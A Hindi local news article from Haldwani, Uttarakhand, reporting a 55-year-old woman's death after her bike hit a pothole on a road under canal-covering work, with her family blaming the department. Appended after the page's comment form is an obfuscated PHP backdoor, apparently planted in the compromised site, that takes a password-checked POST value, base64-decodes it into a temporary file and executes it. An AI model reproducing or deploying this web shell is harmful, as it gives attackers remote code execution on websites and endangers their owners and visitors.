हल्द्वानी: सड़क के गड्ढे ने ले ली महिला की जान, विभाग की लापरवाही नहीं होती तो शायद बच जाती…

Uttarakhand Press News, 11 April 2023: हल्द्वानी: भांजे के साथ बाजार से घर लौट रही एक महिला बाइक से गिरकर घायल हो गई। इलाज के दौरान महिला ने दम तोड़ दिया। जिस सड़क पर हादसा हुआ वहां नहर कवरिंग का काम चल रहा है। इस मामले में मृतक महिला के परिजनों ने संबंधित विभाग पर लापरवाही का आरोप लगाते हुए इस घटना के लिए जिम्मेदार ठहराया है।

बिठौरिया नंबर एक के फेज दो स्थित ईश्वरी कॉलोनी निवासी जानकी देवी (55) रविवार को भांजा रविंद्र के साथ बाइक से बाजार गई थीं। लौटते समय घर से करीब 200 मीटर दूर चौफुला मार्ग पर बाइक सड़क के गड्ढे में जाकर अनियंत्रित हो गई और जानकी गंभीर रूप से घायल हो गई। इसके बाद उन्हें इलाज के लिए निजी अस्पताल में भर्ती कराया गया था।

सोमवार सुबह जानकी देवी ने इलाज के दौरान दम तोड़ दिया। सूचना पर पहुंची पुलिस ने पोस्टमार्टम के बाद शव परिजनों को सौंप दिया। जानकी के परिवार में उनके पति लाल सिंह बिष्ट और दो बेटियां हैं। पत्नी के निधन से लाल सिंह बेसुध और दोनों बेटियां गुमसुम हैं। समाजसेवी मन्नू गोस्वामी ने बताया कि जानकी देवी के परिजन मंगलवार को इस मामले में संबंधित विभाग के खिलाफ कार्रवाई की मांग को लेकर कुमाऊं कमिश्नर और एसएसपी को ज्ञापन सौंपेंगे।

विभाग की लापरवाही नहीं होती तो शायद बच जाती जानकी देवी:
जानकी देवी की मौत के बाद परिजनों में आक्रोश है। वे इसका जिम्मेदार सरकारी महकमे को बता रहे हैं। जानकी के देवर बलवंत सिंह बिष्ट का कहना है कि दो वर्ष से हल्द्वानी-चंबलपुर मार्ग पर नहर कवरिंग का कार्य चल रहा है। इसकी वजह से पूरी सड़क गड्ढों से भर गई है। उन्होंने कहा कि अगर निर्माणदायी संस्था समय से काम पूरा करती और व्यवस्थाओं को चाक-चौबंद रखती तो उनकी भाभी की जान नहीं जाती।

Read Previous

Air India: दिल्ली से लंदन जा रही फ्लाइट में यात्री ने किया हंगामा और हाथापाई, दो चोटिल, दिल्ली लौटा विमान, यात्री को उतारा

Read Next

Dowry: ससुरालियों ने बहू पर बनाया दहेज का दवाब, रचा षड्यंत्र, बेटे को ही कर दिया गायब, ऐसे खुली पोल

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}